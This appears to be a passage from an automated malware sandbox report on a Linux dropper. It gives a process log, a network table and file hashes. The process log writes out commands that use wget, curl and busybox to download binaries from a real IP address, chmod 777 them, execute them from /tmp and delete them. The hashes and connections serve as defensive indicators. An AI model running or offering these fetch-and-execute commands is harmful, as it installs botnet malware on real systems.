[rm nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/usr/bin/wget

[wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/bin/chmod

[chmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ

[./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/bin/rm

[rm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/usr/bin/wget

[wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/bin/chmod

[chmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO

[./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/bin/rm

[rm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97